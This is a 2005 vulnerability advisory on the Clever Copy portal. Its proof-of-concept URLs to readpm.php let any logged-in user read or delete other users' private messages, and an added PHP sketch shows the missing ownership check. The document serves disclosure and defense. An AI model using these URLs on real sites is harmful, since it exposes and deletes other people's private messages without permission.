################################################
Clever Copy Unauthorized read & delete Private Messages
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/clever-copy-unauthorized-read-delete.html
vendor notify: yes
exploit available: yes
OSVDB ID: 18509
Secunia : SA16236
BID:14397
################################################
Clever Copy is a free, fully scalable web site portal and news posting
system. You can run it as a very simple blog or ramp it up to a full
Content Management System.
Clever Copy contains a flaw that allows unauthorized reading and deletion of other users' private messages.
The flaw is triggered when an authenticated user directly requests a
specially crafted URL to gain unauthorized access to private messages.
############
versions
############
Clever Copy 2.0
Clever Copy 2.0a
###############
Solution
###############
No solution at this time !!
###################
Timeline
###################
Discovered: 25-07-2005
Vendor notify:26-07-2005
Disclosure:27-07-2005
###################
proof of concept
###################
First we must be logged in to have access to private messages,
and then go to this URL:
http://[victim]/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass
or
http://[victim]/readpm.php?op=read&ID=2&user=waltrapass
and we see message 2 belonging to the user waltrapass :)
op= read or del
ID= ID of the message we want to look at
name= username of the user who sent the private message
( this is not necessary to view or delete a message)
user= username of the user whose PMs we are trying to look at
To delete a message we can go to a similar URL:
http://[victim]/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass
or
http://[victim]/readpm.php?op=del&ID=2&user=waltrapass
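A sketch of the missing server-side ownership check, as an added example and not Clever Copy's code or a vendor fix: the handler takes the mailbox owner from the session and ignores the `user` parameter. The `pm` table and its columns, the `username` session key and the function name `pm_action` are assumptions.

```php
<?php
// Added example, not Clever Copy code. The pm table, its columns and the
// 'username' session key are assumptions. Needs the pdo_sqlite extension.

function pm_action(PDO $db, array $session, array $query): array
{
    // Identity comes from the server-side session, never from 'user'.
    $owner = $session['username'] ?? null;
    if ($owner === null) {
        return [403, 'login required'];
    }
    $id = filter_var($query['ID'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false) {
        return [400, 'bad message id'];
    }
    $op = $query['op'] ?? '';
    if ($op === 'read') {
        $st = $db->prepare('SELECT body FROM pm WHERE id = ? AND owner = ?');
        $st->execute([$id, $owner]);
        $row = $st->fetch(PDO::FETCH_ASSOC);
        // Same answer for "does not exist" and "not yours".
        return $row ? [200, $row['body']] : [404, 'no such message'];
    }
    if ($op === 'del') {
        $st = $db->prepare('DELETE FROM pm WHERE id = ? AND owner = ?');
        $st->execute([$id, $owner]);
        return $st->rowCount() === 1 ? [200, 'deleted'] : [404, 'no such message'];
    }
    return [400, 'unknown op'];
}

// Constructed sample data: message 2 belongs to waltrapass.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pm (id INTEGER PRIMARY KEY, owner TEXT, sender TEXT, body TEXT)');
$db->exec("INSERT INTO pm VALUES (2, 'waltrapass', 'pruebas', 'hello')");

// The advisory's query string, sent first by a different logged-in user
// (read, then del) and finally by the real owner of the mailbox.
$q = ['op' => 'read', 'ID' => '2', 'name' => 'pruebas', 'user' => 'waltrapass'];
print_r(pm_action($db, ['username' => 'otheruser'], $q));
print_r(pm_action($db, ['username' => 'otheruser'], ['op' => 'del'] + $q));
print_r(pm_action($db, ['username' => 'waltrapass'], $q));
```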
##################### €nd #############################
Thanks to estrella for being my light
Thanks to http://www.osvdb.org/
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....